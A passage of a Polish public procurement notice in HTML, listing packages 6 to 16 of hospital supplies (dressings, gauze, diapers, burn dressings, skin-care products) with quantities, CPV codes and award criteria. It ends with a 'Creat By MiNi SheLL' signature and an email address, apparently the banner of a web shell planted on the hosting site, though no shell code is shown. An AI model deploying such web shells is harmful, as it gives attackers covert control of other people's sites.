(rozmiar max. ok. 4x6 cm) szt	2 500
Plaster z opatrunkiem 8 cm na tkaninie bawełnianej lub wiskozowej m.	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.11-1, 33.14.11.12-8, 33.14.11.13-4, 33.14.11.14-2, 33.14.11.15-9, 33.14.11.19-7, 33.19.80.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Koszt kredytowania - 10</li>
<li>3. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opatrunki przylepne:
Opatrunek pooperacyjny włókninowy jałowy 7-7,2 cm x 5 cm szt	600
Opatrunek pooperacyjny włókninowy jałowy 10 cm x 6 cm szt	600
Opatrunek pooperacyjny włókninowy jałowy 15 cm x 6-10 cm szt	600
Opatrunek pooperacyjny włókninowy jałowy 10 cm x 8-10 cm szt	600
Opatrunek pooperacyjny włókninowy jałowy 20 cm x 8-10 cm szt	600
Opatrunek pooperacyjny włókninowy jałowy 25 cm x 10 cm szt	300
Opatrunek pooperacyjny włókninowy jałowy 35 cm x 10 cm szt	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.11-1, 33.14.11.12-8, 33.14.11.13-4, 33.14.11.14-2, 33.14.11.15-9, 33.14.11.19-7, 33.19.80.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Koszt kredytowania - 10</li>
<li>3. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opatrunki specjalistyczne:
Kompres z alginianem wapnia 10 cm x 10 cm szt.	400
Kompres z alginianem wapnia 5 cm x 5 cm szt.	80
Opatrunek przeźroczysty samoprzylepny z warstwą chłonną 9cm x 15 cm	10
Opatrunek do aktywnego oczyszczania ran zakażonych, obustronnie aktywny do 12 godz. 7,5cmx7,5 cm szt.	300
Opatrunek do aktywnego oczyszczania ran zakażonych, jednostronnie aktywny do 24 godz. 7,5cmx7,5 cm szt.	400
Opatr. hydrokoloidowy do wilgotnego opatrywania ran 10 cm x 10 cm szt.	600
Opatr. hydrokoloidowy do wilgotnego opatrywania ran 15 cm x 15 cm szt.	50
Opatr. przeźroczysty żelowy z folią mocującą 10 cm x 7,5-10 cm szt.	10
Opatr. przeźroczysty żelowy z folią mocującą 12,5 cm x 12,5 cm szt.	20
Opatr. przeźroczysty, jałowy, samoprzylepny do osłonięcia ran 10 cm x 14-15 cm szt.	2 000
Opatrunek siatkowy z maścią do opatrywania ran 5 x 5	200
Opatrunek siatkowy z maścią do opatrywania ran 10 x 10	500
Antybakteryjny jałowy opatrunek z maścią neutralną zawierający 
srebro metaliczne 5 x 5 cm szt.	40
Antybakteryjny jałowy opatrunek z maścią neutralną zawierający 
srebro metaliczne 10 x 10 cm szt.	300
Antybakteryjny jałowy opatrunek z maścią neutralną zawierający 
srebro metaliczne 10 x 20 cm szt.	150
Jałowy opatrunek siatkowy impregnowany cząsteczkami hydrokoloidowymi i neutralną maścią 5x5 cm szt.	10
Jałowy opatrunek siatkowy impregnowany cząsteczkami hydrokoloidowymi i neutralną maścią 10x12 cm szt.	10
Jałowy opatrunek siatkowy impregnowany cząsteczkami hydrokoloidowymi i neutralną maścią 15x20 cm szt.	10
Opatr. przeźroczysty, jałowy, samoprzylepny do osłonięcia ran 6 cm x 9-10 cm szt.	50
Hydrożelowy żel amorficzny a 15g szt.	100
Jałowy, samoprzylepny hydropolimerowy opatrunek piankowy 11cmx11cm szt.	10
Jałowy, samoprzylepny hydropolimerowy opatrunek piankowy 15cmx15cm szt.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.11-1, 33.14.11.12-8, 33.14.11.13-4, 33.14.11.14-2, 33.14.11.15-9, 33.14.11.19-7, 33.19.80.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Koszt kredytowania - 10</li>
<li>3. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet nr 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opatrunki specjalistyczne II:
Opatrunek bakteriobójczy nasączony rozpuszczalnym żelem jodoforowym 5x5 cm a 25 szt.	10
Opatrunek bakteriobójczy nasączony rozpuszczalnym żelem jodoforowym 9,5x9,5 cm a 25 szt.	35
Opatrunek z węglem aktywowanym srebrem aktywnym na MRSA 10,5x10,5cm a 10 szt.	5
Opatrunek kolagenowy 10x10cm	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.11-1, 33.14.11.12-8, 33.14.11.13-4, 33.14.11.14-2, 33.14.11.15-9, 33.14.11.19-7, 33.19.80.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Koszt kredytowania - 10</li>
<li>3. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet nr 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pieluchomajtki do sklepu-medyczno-zielarskiego:
Pieluchomajtki dla dorosłych M szt.	30 000
Pieluchomajtki dla dorosłych M o zwiększonej chłonnościszt.	15 000
Pieluchomajtki dla dorosłych S o zwiększonej chłonnościszt.	2 500
Pieluchomajtki dla dorosłych S szt.	4 000
Pieluchomajtki dla dorosłych XL szt.	4 500
Pieluchomajtki dla dorosłych XL o zwiększonej chłonności szt.	3 500
Pieluchomajtki dla dorosłych L  o zwiększonej chłonności szt.	30 000
Pieluchomajtki dla dorosłych L  szt.	45 000
Podkłady chłonne  90x60 szt.	3 000
Wkładki anatomiczne małe szt.	1 000
Wkładki anatomiczne średnie szt.	5 000
Wkładki anatomiczne duże szt.	5 000
Pieluchomajtki dla dorosłych S o największej chłonnościszt.	300
Pieluchomajtki dla dorosłych M o największej chłonnościszt.	5 000
Pieluchomajtki dla dorosłych L o największej chłonnościszt.	5 000
Pieluchomajtki dla dorosłych XL o największej chłonnościszt.	1 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.11-1, 33.14.11.12-8, 33.14.11.13-4, 33.14.11.14-2, 33.14.11.15-9, 33.14.11.19-7, 33.19.80.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Koszt kredytowania - 10</li>
<li>3. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet nr 10.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pieluchomajtki dla noworodków i dzieci:
Pieluchomajtki dla noworodków 2 kg-5 kg z wycięciem na pępowinę (bezlatexowe) szt.	50000
Pieluchomajtki dla dzieci 3 kg-6 kg ( bezlatexowe) szt	1000
Pieluchomajtki dla dzieci 11-12 kg-25 kg (bezlatexowe) szt.	1000
pieluchomajtki dla dzieci 7 kg-18 kg (bezlatexowe) szt.	10000
Pieluchomajtki dla dzieci 4 kg- 9 kg (bezlatexowe) szt.	6000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.11-1, 33.14.11.12-8, 33.14.11.13-4, 33.14.11.14-2, 33.14.11.15-9, 33.14.11.19-7, 33.19.80.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Koszt kredytowania - 10</li>
<li>3. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet nr 11.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lignina, wata:
Lignina bielona arkusze kg	2 100
Lignina rolki a 150 g szt. 	300
Wata opatrunkowa bawełniano-wiskozowa a 200 g szt.	1 100
Wata opatrunkowa bawełniano-wiskozowa a 500 g szt.	250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.11-1, 33.14.11.12-8, 33.14.11.13-4, 33.14.11.14-2, 33.14.11.15-9, 33.14.11.19-7, 33.19.80.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Koszt kredytowania - 10</li>
<li>3. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet nr 12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kompresy:
Kompresy gazowe wyjałowione 8W 17N 5cm x 5cm x 3szt., op.	5 000
Kompresy gazowe wyjałowione 8W 17N 5cm x 5cm x 5szt., op.	50 000
Kompresy gazowe wyjałowione 8W 17N 5cm x 5cm x 10szt., op.	7 000
Kompresy gazowe wyjałowione 8W 17N 7,5cm x 7,5cm x 3szt., op.	3 000
Kompresy gazowe wyjałowione 8W 17N 7,5cm x 7,5cm x 5szt., op.	50 000
Kompresy gazowe wyjałowione 8W 17N 7,5cm x 7,5cm x 10szt., op.	8 000
Kompresy gazowe wyjałowione 8W 17N 10cm x 10cm x 3szt., op.	4 000
Kompresy gazowe wyjałowione 8W 17N 10cm x 10cm x 5szt., op.	42 000
Kompresy gazowe wyjałowione 8W 17N 10cm x 10cm x 10szt., op.	12 000
Kompresy gazowe wyjałowione 8W 17N 10cm x 10cm x 20szt., op.	1 800
Kompresy gazowe wyjałowione 8W 17N 10cm x 10cm x 40szt., op.	1 500
Kompresy gazowe wyjałowione 8W 17N 5cm x 5cm x 20szt., op.	1 000
Kompresy gazowe wyjałowione 8W 17N 7,5cm x7, 5cm x 20szt., op.	1 000
Kompresy gazowe wyjałowione RTG 12W 17N 5cm x 5cm x 10szt., op.	1 000
Kompresy gazowe wyjałowione RTG 12W 17N 7,5cm x 7,5cm x 10szt., op.	200
Kompresy gazowe wyjałowione RTG 12W 17N 10cm x 10cm x 20szt., op.	1 500
Kompresy gazowe wyjałowione RTG 12W 17N 10cm x 10cm x 40szt., op.	1 000
Serweta operacyjna wyjałowiona z RTG i tasiemką 4W 17-20N, 45 cmx 45cm x 2szt., op.	1 000
Serweta operacyjna wyjałowiona z RTG i tasiemką 4W 17-20N, 45 cmx 70cm x 3szt., op.	4 500
Tupfery wyjałowione z gazy 20-nitkowej z RTG w kształcie kuli ok. 20x20 cm x 10szt., op.	100
Tupfery wyjałowione z gazy 20-nitkowej z RTG w kształcie kuli ok. 24x24 cm x 10szt., op.	100
Tupfery wyjałowione z gazy 24-nitkowej z RTG w kształcie fasoli ok. 12x12 cm x 10szt., op.	300
Gaza wyjałowiona 0,5m x 1m,17N, szt.	5 500
Gaza wyjałowiona 1m x 1m,17N, szt.	13 000
Kompresy włókninowe 30-40G 6W z nacięciem Y 10x10 cm a2 szt.	3 000
Kompresy włókninowe 30-40G 6W z nacięciem Y 7,5x7,5 cm a2 szt.	1 500
Gaza niejałowa  0,9 mx100m op. 17 nitkowa	40
Kompresy gazowe niejałowe 10 cm x 10 cm x 100 8W 17 nitkowe 	200
Kompresy gazowe niejałowe 5 cm x 5 cm x 100 8W 17 nitkowe	6 000
Kompresy gazowe niejałowe 7,5 cm x 7,5 cm x 100 8W 17 nitkowe 	200
Serweta operacyjna 45 cm x 45 cm z elementem RTG i tasiemką 20N, 4W, szt.	2 500
Kompresy gazowe niejałowe 10 cm x 10 cm x 100 + nitka RTG  12W 17 nitkowe	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.11-1, 33.14.11.12-8, 33.14.11.13-4, 33.14.11.14-2, 33.14.11.15-9, 33.14.11.19-7, 33.19.80.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Koszt kredytowania - 10</li>
<li>3. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet nr 13.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jałowe różne:
Seton 17N 4W 2m x 5cm	1 000
Opaska elasyczna 5m x 15cm	5 000
Opaska dziana 4m x 15cm	15 000
Podkłady ginekologiczne 34x9 cm a10 szt.	2 200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.11-1, 33.14.11.12-8, 33.14.11.13-4, 33.14.11.14-2, 33.14.11.15-9, 33.14.11.19-7, 33.19.80.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Koszt kredytowania - 10</li>
<li>3. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet nr 14.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opatrunki pooparzeniowe:
Sterylny opatrunek hydrożelowy , schładzający  10x10 cm	15
Sterylny opatrunek hydrożelowy , schładzający  5x15 cm	15
Sterylny opatrunek hydrożelowy , schładzający  10x40 cm	10
Sterylny opatrunek pooparzeniowy 20x20 cm	20
Sterylny opatrunek hydrożelowy , schładzający 20x45-46 cm	30
Sterylny opatrunek pooparzeniowy 60x40 cm	10
Sterylny opatrunek pooparzeniowy na twarz 20x45 cm	5
Sterylny opatrunek hydrożelowy , schładzający  twarz, 30x40 cm	10
Sterylny opatrunek hydrożelowy , schładzający  , dłoń 20x50 cm	5
Koc poopażeniowy 100x100 cm	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.11-1, 33.14.11.12-8, 33.14.11.13-4, 33.14.11.14-2, 33.14.11.15-9, 33.14.11.19-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Koszt kredytowania - 10</li>
<li>3. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet nr 15.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Środki pielęgnacyjne:
Lotion myjąco - natłuszczający do mycia całego ciała z biokompleksem lnianym. Pojemność 500 ml. 	50
Pianka myjąco - pielęgnująca . Pojemność 500 ml. 	50
Krem myjący 3wl do całego ciała z biokompleksem lnianym. Pojemność 950 ml. 	50
Balsam do ciała. Pojemność 250 ml. 	25
Żel do ciała z Guaraną. Pojemność 250 ml. 	25
Krem do suchej, zrogowaciałej skóry, 10% UREA. Pojemność 100 ml. 	40
Krem ochronny z tlenkiem cynku. Pojemność 200 ml. 	40
Krem ochronny z argininą. Pojemność 200 ml. 	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.11-1, 33.14.11.12-8, 33.14.11.13-4, 33.14.11.14-2, 33.14.11.15-9, 33.14.11.19-7, 33.19.80.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Koszt kredytowania - 10</li>
<li>3. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet 16.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pieluchomajtki:
Pieluchomajtki dla dorosłych M szt. o chłonności min. 1550 ml	10 000
Pieluchomajtki dla dorosłych M o chłonności min. 1850 ml	1 000
Pieluchomajtki dla dorosłych S o chłonności min. 1500 ml	500
Pieluchomajtki dla dorosłych S o chłonności min. 1350 ml .	500
Pieluchomajtki dla dorosłych XL o chłonności min 2200 ml.	1 500
Pieluchomajtki dla dorosłych XL o chłonności min 2400 ml.	500
Pieluchomajtki dla dorosłych L  o chłonności min. 2150 ml.	500
Pieluchomajtki dla dorosłych L  o chłonności min. 2000 ml.	70 000
Pieluchomajtki anatomiczne duże szt.	1 000
Pieluchomajtki anatomiczne średnie szt.	600
Podkłady chłonne ok.. 90x60 szt.	5 000
Pieluchomajtki dla dorosłych S o chłonności min. 1950 ml	500
Pieluchomajtki dla dorosłych M o chłonności min. 2750 ml	500
Pieluchomajtki dla dorosłych L o  chłonności min. 2950 ml	500
Pieluchomajtki dla dorosłych XL o chłonności min. 3250 ml	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.11-1, 33.14.11.12-8, 33.14.11.13-4, 33.14.11.14-2, 33.14.11.15-9, 33.14.11.19-7, 33.19.80.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Koszt kredytowania - 10</li>
<li>3. Jakość - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com